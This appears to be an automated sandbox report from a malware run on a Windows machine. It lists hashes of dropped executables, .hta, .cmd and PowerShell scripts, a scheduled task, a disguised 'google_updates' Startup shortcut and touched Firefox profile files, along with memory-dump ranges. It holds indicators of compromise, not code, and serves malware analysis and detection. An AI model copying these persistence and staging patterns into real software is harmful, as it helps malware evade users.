C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe

MD5 b5db83c03a37b4cd4746a6080133e338
SHA1 edf3f7e5c3bda89e1382df8f7d0443783426c834
SHA256 8bf5d7ea5c499425488b94f13497a5c3b02997f00ec88fad1b577736fab245df
SHA512 e99da7c87f01dc7459b57d0ce3df799aeb22738840f047c56fb319dc8edddc00ae303ca02916b4b09690df3ff14d559fac44b3e627c6b24498338cfa290fc313

memory/3616-8-0x0000000000D51000-0x0000000000DB1000-memory.dmp

memory/228-12-0x00000000000D0000-0x000000000058F000-memory.dmp

memory/3616-10-0x0000000000D50000-0x0000000001077000-memory.dmp

memory/228-14-0x00000000000D0000-0x000000000058F000-memory.dmp

memory/228-13-0x00000000000D1000-0x00000000000FF000-memory.dmp

memory/228-16-0x00000000000D0000-0x000000000058F000-memory.dmp

memory/228-28-0x00000000000D0000-0x000000000058F000-memory.dmp

memory/2816-29-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/2816-30-0x00000000008C1000-0x00000000008EF000-memory.dmp

memory/2816-31-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/2816-32-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/2816-33-0x00000000008C0000-0x0000000000D7F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

C:\Users\Admin\AppData\Local\Temp\6C1.tmp\6C2.tmp\6C3.bat

MD5 3895cb9413357f87a88c047ae0d0bd40
SHA1 227404dd0f7d7d3ea9601eecd705effe052a6c91
SHA256 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785
SHA512 a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zmy4emts.2ob.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4960-56-0x000002AB7D7C0000-0x000002AB7D7E2000-memory.dmp

memory/2816-60-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/2816-61-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/2816-62-0x00000000008C0000-0x0000000000D7F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 73636685f823d103c54b30bc457c7f0d
SHA1 597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

MD5 47177b7fbf1ce282fb87da80fd264b3f
SHA1 d07d2f9624404fa882eb94ee108f222d76bbbd4c
SHA256 e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
SHA512 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

memory/3296-106-0x0000000000B20000-0x0000000000B30000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/1812-121-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe

MD5 83cd4a3ac24bea5dd2388d852288c7de
SHA1 059245d06571b62c82b059a16b046793f6753dbc
SHA256 a8bc81ff72efd02a4edf01f87d1f108886d80a2484a91e776a4e947b3f47bad1
SHA512 5133d4638db05e87daaba1b5725ddaaddb434440e31a2241732dfcc21d3f8c03212f715171d990f0fd601eb926a8a0308b93f5d8139c697399a06e891725c31c

C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta

MD5 1133b5f5232e72f319e81f423d83c8c7
SHA1 3a0b2f7db1c949b60db7ce87e161425a4f75b4ed
SHA256 34cba07197922655997ab29f2bbdd11b05fdf8e917342c39a9c0844907b11a5a
SHA512 5a9a5a30503e2600d9dcb07e93de3ea166d4b10967d6fed777b8d31e4ce777e6d903443f4a8ca70d6f67d0d1e9db81e949a26e87be606a0fee6d2d72e8fa59ba

memory/2132-147-0x0000000004510000-0x0000000004546000-memory.dmp

memory/2132-148-0x0000000004D20000-0x0000000005348000-memory.dmp

memory/2132-149-0x0000000004C20000-0x0000000004C42000-memory.dmp

memory/2132-150-0x0000000005400000-0x0000000005466000-memory.dmp

memory/2132-151-0x0000000005470000-0x00000000054D6000-memory.dmp

memory/2132-157-0x00000000054E0000-0x0000000005834000-memory.dmp

memory/2816-162-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/2132-163-0x0000000005AD0000-0x0000000005AEE000-memory.dmp

memory/2132-164-0x0000000005AF0000-0x0000000005B3C000-memory.dmp

memory/2132-165-0x00000000071F0000-0x000000000786A000-memory.dmp

memory/2132-166-0x0000000005FF0000-0x000000000600A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 70595b5937369a2592a524db67e208d3
SHA1 d989b934d9388104189f365694e794835aa6f52f
SHA256 be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8
SHA512 edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5

C:\Users\Admin\AppData\Local\Temp\installer.ps1

MD5 b6d611af4bea8eaaa639bbf024eb0e2d
SHA1 0b1205546fd80407d85c9bfbed5ff69d00645744
SHA256 8cd3bf95cedcf3469d0044976c66cbf22cd2fecf21ae4f94986d7211d6ba9a2b
SHA512 d8a4ec5bd986884959db3edfd48e2bf4c70ead436f81eab73b104aa0ff0f5dadfb6227cb2dab1f979f0dbb3aafbc1889ed571fb6e9444a09ae984b789314463d

\??\c:\Users\Admin\AppData\Local\Temp\5wlhjbmh\5wlhjbmh.cmdline

MD5 8b2f8b71178a4e99b5358e9e6ad2db5b
SHA1 26556abb464e42523c3f166ac55e5b74255b13ed
SHA256 90a396dab7e88da62546d17430e1915c06a631edc5ea965bc4e4c417ad31f8aa
SHA512 6512ef322237053ea3d69283fb3706fd4eebb0dd6b2015ed4cda5993ea34ec1b423e1503bdb08b560e5a1636926360cf6424d3a39ddeb5968d5299dfbaf3c16d

\??\c:\Users\Admin\AppData\Local\Temp\5wlhjbmh\5wlhjbmh.0.cs

MD5 1809fe3ba081f587330273428ec09c9c
SHA1 d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9
SHA256 d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457
SHA512 e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28

\??\c:\Users\Admin\AppData\Local\Temp\5wlhjbmh\CSCA8772FE477F3431A8E4EB01FFA7070FE.TMP

MD5 948dca49ee090711abd80c3d94065e89
SHA1 7c645e1d05b9cd46138a0d1936350b5d9cefbd6c
SHA256 31cdeebecb211e84d227d802fbd73fb3fe279a385c7742c29c3f7ab5b8f7bfbb
SHA512 cf5a4a78f265945b22f4c02aedbe0af60035062b88b798deb01d58017a0ae6e179f852debff6886bd5ed72daeb3ab3cbd2be94f2f694d9e7f1bd33c299cf77c0

C:\Users\Admin\AppData\Local\Temp\RES4FE0.tmp

MD5 311e2d48c8fa9c32173bace134fef0a3
SHA1 dd1daa6f91891161dae59ad89f204cb3ca369e98
SHA256 107bfdf1ded7cb25f5c54fcdfd0473103a835a418392037b1323553701b88281
SHA512 4badf8c1ca16eaee2b4cc879fd9cc65581ea7373163f18376b7a45fab0d5c6527a9578a23eec41bab7f55afda88eacc9ffcebff60adea7710b81fc1550b14fd2

memory/3928-213-0x000001E83B880000-0x000001E83B888000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5wlhjbmh\5wlhjbmh.dll

MD5 5f2dd6543692ba0c47a5503c71f3117f
SHA1 b430927d369d1f31240db9bd8b600c6b055ea710
SHA256 172670b2c3c564f84cd63df2eac138656846c707d7c589db553cd1393aa3f230
SHA512 fa2eabd5dd2e7c20907386520fb9818ad2697c6d0421dba5ca85466db41bbe1610c9f59d5cc00fc7e4ef997ff3107652e41384cda08e1db29bf3ed3b2082371e

memory/3380-215-0x000000000D230000-0x000000000DAB3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 6195a91754effb4df74dbc72cdf4f7a6
SHA1 aba262f5726c6d77659fe0d3195e36a85046b427
SHA256 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5
SHA512 ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f9f0c9fa8aa6bf9f467c23d27aa9cc44
SHA1 ff5c820bef43474569629fcebccee9817eb56b67
SHA256 38990de0f663874fd9457d27473119ddec6f487a871f9b6188b46d19e67a4e95
SHA512 5be9c9258acd47ab73a20bfea9b0f68001bd5a120afe06b634094943a9e809179061d108ea8a5feeffa1929c6b2e5bcc5b941d8cc193b98e045050bacd2267bf

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 79f0758190376147ab0e2adb0f3dbeb7
SHA1 bc6a39273f747a175f2d06e5b41fc6e830a072b9
SHA256 dff076712216c78e0876383bb682955c1011d91c0bdbcfd5ca7dd2dae5340293
SHA512 18f0be0b8f6fb5ab32131e2e06799588c23e4d79473e1cc0a7a8fac46bd54214692c903c4bba7d25c111ab22980c2861c06e711272e7b80574fc208fc6589124

memory/2132-247-0x0000000006F90000-0x0000000007026000-memory.dmp

memory/2132-248-0x0000000006F20000-0x0000000006F42000-memory.dmp

memory/2132-249-0x0000000007E20000-0x00000000083C4000-memory.dmp

memory/4640-260-0x0000000000A00000-0x0000000000EBF000-memory.dmp

memory/1812-258-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1812-257-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 72a626e77455e405451d9741c79e65f4
SHA1 c55704e51c8e1d0463a27ea11d4ca31f44653f60
SHA256 8ae2ccdcf432d61857c2722f95884fb8f3a478d43af4275193f738fc73e3d6c9
SHA512 d69db24884f74d8bef21ca097ff56e2fc8d71cd3186a6d8f431aefac42a07394d68783b46bec2518db664606b3ca9663e72b97df9acbee25ca63fc324404ccbc

memory/4640-264-0x0000000000A00000-0x0000000000EBF000-memory.dmp

C:\Temp\4buU3vPam.hta

MD5 39c8cd50176057af3728802964f92d49
SHA1 68fc10a10997d7ad00142fc0de393fe3500c8017
SHA256 f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512 cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

memory/4236-271-0x0000000005DF0000-0x0000000006144000-memory.dmp

memory/4236-277-0x0000000006740000-0x000000000678C000-memory.dmp

memory/2816-278-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/448-286-0x00000000005A0000-0x0000000000A5F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe

MD5 6afaf17077308fa040a656dc9e7d15ed
SHA1 df7caf0b424dc62a60dfb64f585c111448c0c1e3
SHA256 42c07ef38b42451a7b1717dff97266f615f2e5cedab1c5c5827dbe3e6d9f69b0
SHA512 cd459aa3bc462822a61a9f3e943aef48e9e332661c562c39bd92388be1544f034afef9f5f02315b5bce5419564ed4f3fb94e76efcb4422fdd7775aeb011be986

memory/448-297-0x00000000005A0000-0x0000000000A5F000-memory.dmp

memory/1936-305-0x00000000008B0000-0x00000000012BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/4784-323-0x0000000000320000-0x0000000000398000-memory.dmp

memory/1032-326-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1032-328-0x0000000000400000-0x0000000000465000-memory.dmp

memory/1812-329-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2816-330-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/1936-331-0x00000000008B0000-0x00000000012BD000-memory.dmp

memory/1936-332-0x00000000008B0000-0x00000000012BD000-memory.dmp

memory/4236-333-0x0000000000400000-0x000000000042F000-memory.dmp

memory/4912-334-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4912-335-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4912-343-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4912-344-0x0000025156E00000-0x0000025156E20000-memory.dmp

memory/4912-349-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4912-347-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4912-346-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4912-348-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4912-345-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4236-350-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1936-352-0x00000000008B0000-0x00000000012BD000-memory.dmp

memory/1812-355-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4236-357-0x0000000010000000-0x000000001001C000-memory.dmp

memory/2816-361-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/4912-363-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\APYB1149\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/4760-371-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1812-370-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1612-373-0x00000000008C0000-0x0000000000D7F000-memory.dmp

C:\Windows\Tasks\Test Task17.job

MD5 e98b04b624a464b1c29c568ce5c01d80
SHA1 0e2dbfea3364a1fe6e0a71cc73a9c816badf8ebc
SHA256 e1af114b172e3e860fffedc2dd9845bd9c55407915e2e3fa2178b93741e2f1ef
SHA512 3c62665d36228919f0af16328c1fe20a1f44f7bb15d6c20fe52ddb20f4c300516c10096830790fdf77abe6bc1c36308da1f5f3b7499bc9de1c346c61a7b2d45c

memory/1612-376-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/2816-378-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/4912-380-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe

MD5 5d153f73ce1b6a907cf87ddb04ba12b2
SHA1 bfda9ee8501ae0ca60f8e1803efea482085bf699
SHA256 2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c
SHA512 0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102

memory/2644-396-0x00000000002D0000-0x0000000000F21000-memory.dmp

memory/4760-398-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1812-399-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4760-400-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2816-402-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/4912-404-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe

MD5 8538c195a09066478922511ea1a02edf
SHA1 15e8910df845d897b4bb163caef4c6112570855b
SHA256 d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96
SHA512 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c

memory/1032-419-0x0000000000F50000-0x00000000013FB000-memory.dmp

memory/2644-420-0x00000000002D0000-0x0000000000F21000-memory.dmp

memory/2644-443-0x00000000002D0000-0x0000000000F21000-memory.dmp

C:\Users\Admin\Desktop\YCL.lnk

MD5 f63714e3ad1cc2dbf8465ca21b151566
SHA1 e294fcaedd5f255ae930ad78509e57001369a915
SHA256 838cc8e53c2ff83ce4ec76dac7679b9a888cd7923b9f60ff9194cad29283da25
SHA512 05e85a65ba2a618630fa850f53d555facd0ff3979376306b3a044b30f7524fd1cba3319a759b2044aedb1ac1e6127bab0ed27c141ea816c70b1143410ff375bf

C:\Users\Admin\AppData\Local\Temp\BWee4D3AYfw9GE1K6DFDSwdJt\Y-Cleaner.exe

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

memory/2644-467-0x00000000002D0000-0x0000000000F21000-memory.dmp

memory/4624-466-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1812-468-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4912-470-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4912-471-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

memory/4760-473-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1032-475-0x0000000000F50000-0x00000000013FB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe

MD5 2a48e7b047c5ff096c6dce52d4f26dbb
SHA1 e0d61e10b27131b1c34ade44d1a2117afd2cf099
SHA256 42642893c6a6af226aab5b2cce0875e7affebf7d1001146ddd90234d4c01492d
SHA512 75965d3aa7cda41ecc11f87b1ac2b12283d58650f5b96f2af560aff859ca74c0c0cb26dfc765b4d8318291d8f89fdbb338fb71ddf3f4b63389aedb5e2106165a

memory/2456-496-0x0000000000AB0000-0x0000000000DC4000-memory.dmp

memory/2816-497-0x00000000008C0000-0x0000000000D7F000-memory.dmp

memory/4912-499-0x00007FF6D5BB0000-0x00007FF6D6474000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe

MD5 338a31056b3b81d48a292a7bf9af67c7
SHA1 f5061e3583ba604b25e316f12fc58f40238d44b4
SHA256 cd1c085a07dc81e4305c2b9ee57e5c0433858c97cb20b1743cf44931c431ccea
SHA512 5bc7823cbd1ab6fa963df8f152d8b6de56af41159f3a736d147f1e5b4dcba3007319e2d2fb13e97f1e8b3cce3ab0d17e31d541be1ab53f8bd05a42316a940abc

memory/4432-514-0x0000000000D50000-0x00000000013D7000-memory.dmp

memory/4432-518-0x0000000000D50000-0x00000000013D7000-memory.dmp

memory/4760-520-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2456-528-0x0000000000AB0000-0x0000000000DC4000-memory.dmp

memory/3816-525-0x0000000000F30000-0x00000000013EF000-memory.dmp

memory/2456-524-0x0000000000AB0000-0x0000000000DC4000-memory.dmp

memory/3816-530-0x0000000000F30000-0x00000000013EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe

MD5 c0caf5a901b162b6792eab9697827b5d
SHA1 d078ba4ad104c40bf5f2c8afda1cbdf4afc55a84
SHA256 28c182baea1726c3e851405b13f130e02817099758abab86ca9cdc3607b9f89f
SHA512 3fba4eb7a2bc21fc24a6e29495e598efc5f208db030b13de8af43a392a93e3a920e4e8e4b68e10d4dc4a0e8779401ca738172ca9cba2ddc2246854c41a8a58a5

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\AlternateServices.bin

MD5 81ee27532211182c34e9c0246a85b0da
SHA1 07843f9d9db85ea4d887818daf242599d37af358
SHA256 4f8f022b76ac46855ab82930bd2e1882fa866336bf98993ecbba41c4b3a61a88
SHA512 b320052fd5dafeaa8a80e5cad7b4d9314c7b0d15161955bcdd23a247fd8921553d8b668449cb9dfde10bcc74f7b265db0653f883d2fc03bfd6e57b9a1dc2929d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\a1299b2b-d5c1-40fe-b2e5-e91f2d7e139b

MD5 bafa8b3ea120ee6a0e860799009fcf7e
SHA1 86b328433db67f6d38ca4a763a1f014c226e60a0
SHA256 900f9ff0eaa5ab4a96a069a9b2689d1285bd250d6098740bc9f45f4f83549f3b
SHA512 c2eec21a186504b899671bd3aa2b27e4d9f78c6e836b329fe2efe06bb4e8a51eaa64fc7b14a1543e04e115eef1642b7fd74e328fff4ed04c1344eff8b581f843

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp

MD5 404002aafe8163f795edaf2cbe471b27
SHA1 661f56ff4d3ecfa2ffa8fb6510c2169f6243d284
SHA256 a47aaeb46c580900d89949acf08c973fbec44a06e33db88fd57be3bae9a1e482
SHA512 5e2d6a4885f16fda6c3d23cbd589941cb22be938c27eb9dcd715a650ff2de232fa001f942d9a6d28b2df8392037809f21992bd2f06a3eb385302be5943551ffa

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp

MD5 2d38ae9732a366ebccdc6c2a67d88898
SHA1 cef963367e7ee5de5fdec8a545e6ccd72043ae4d
SHA256 e1b5673474f3236cfa8d26802979d1570306c509d359336dbf49b1aeb3beb96b
SHA512 6283dd7be5c7bcf60a3e76e98519c7876fc48456b88cce09511640a307f6f5ee97762668d027cba39c7173feb20b67b8c6d793a6ec3c92ddd313a9a508baa303

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\d9d3bfe7-b788-415a-a9fe-99948fc4a8d9

MD5 24e9911a2a15c19423d39916b27eab90
SHA1 97ef9de317c35b69c804b46f9b26b12228338fb1
SHA256 f00a640a88c6bef7a914075287109e7583a1dd736de829fd3e25abe7d0e8e0f4
SHA512 dc04ca538f1e7b095519eb797a1ce50076734044f3cb660fdc0db14c5bbb6e7052ac2b91c68f57d1edccb592e8614ec12fa0d62e63758a699d0d6c97850cdf9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\60c1d7d6-a364-4369-b78d-ad1a661f4b6b

MD5 84c500c830911598ab5eee127e9f467d
SHA1 61846eede4ce7fe445097cb13f17cb12c43706de
SHA256 3dfdc57ac381a9d99f33203deafb77edf2eab4c4058f83df34c61e6d3de03995
SHA512 ce77ab6f0cb4a298a9a9e3b328e309d62dfedf8e7278271acc23d278fc93f333a856729b98f703af32dbbe89732a4eddb2bfff0a253d5fe1032d926b483c708b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk

MD5 7ab39bc35195b01db0eb09e6452b70f7
SHA1 e10c2c3f3c293fc28250293f383076a31da948bb
SHA256 8eca63b166c7812902bfb6ff78a5874aee74cc2b7e7fcd096a3d2aae78b78160
SHA512 5f880a2225e07333a6dd708fe2388350e3316cdb44f7445741cae2e9ff698c2957518a33ddfb429a35403c0da833dcb7b97d44d1234a2d33c0d8ecb2064d8a26

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp

MD5 2c5e426ef34ae0ddb2b4ebdaa8184ae8
SHA1 0e526a5326f68c9e8d1a6c7e8dbe70dd17daab95
SHA256 40211d6623b8fd504f1b279afccc9bec90ae18bb4091a8c867adfb6437d9a5b8
SHA512 c388e9a8d1e4a8b7df6d13c9de8f8aeca7374112a97e65aefefa3f3f656cfd19504c6791eee31a9c317dd715c763bb3bfbb61c1ce2a126e60824a05f540a84f9

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\AlternateServices.bin

MD5 f39d49c4f27e85ed0c82b9c6223aacdd
SHA1 438f1abe9f9ca52f9319644fbcd33075ca09e636
SHA256 fc6291f43501d87d078966f98a9f459ab1e903f0d04164a78dc0568fdd2321de
SHA512 08f97868029365416824a99fde1df74abccd5a6e250dd22abdeac8cf93fd1e978e6de8ce1534e4410c7e1563d71491dc96e4a07a2834cdc32f0b2565057ec4bc

C:\Users\Admin\AppData\Local\Temp\10107740101\91ff33b7b2.exe

MD5 8043b20e32ff2f0c75e9a3eed0c4bf07
SHA1 5464aa1bc2a91c64cd8c4cbbb6970e8189c158a3
SHA256 69a487512dfb97f08d068d0f9dd3924f42bef46bddd79112cb206b00fc16713e
SHA512 35639c6aad3dd25f606ca72ad108f774b083fa62677772242d357d59add9bba1dc85532d58ae67277d90c04dd4a5189548ca331fe93ee086c31cacbf11b8a18c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\prefs.js

MD5 dfb0400d1a77ffb15cde456b2cdeec0f
SHA1 fd4af4a023e325dcb5c4c5360805aa1c2217eeda
SHA256 1007d8d31584a29169e6704d524ca0c388692ebe64ca720d7a9296b42b32cb6a
SHA512 a1fe02e61d35a1d8fe5c8e2c214808c1f84c96f986bd52717163a4dad8899a7878257d92cc4f71166872a0d52149251f8cb53c7392c8a9b28a6e364cfe7fae25

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\prefs-1.js

MD5 f1a33e2276c5393129593c774f09be6f
SHA1 56d742a549f8ac2e6c135c9d8dba15360a3983c3
SHA256 a771646130c498cce69f92d8b1aaf1219a6e404f2927ddd650e46b08271c023c
SHA512 8076340769a114a1afccf202e3c420f88c862af61f5345fcaeb05d5907f88c0a97f469bebcda206888ee2f3cbe8ff35fdb3dc7c61bf5cbb5793e90a0b2053acc

memory/5292-895-0x0000000000CB0000-0x0000000001108000-memory.dmp

memory/5292-907-0x0000000000CB0000-0x0000000001108000-memory.dmp

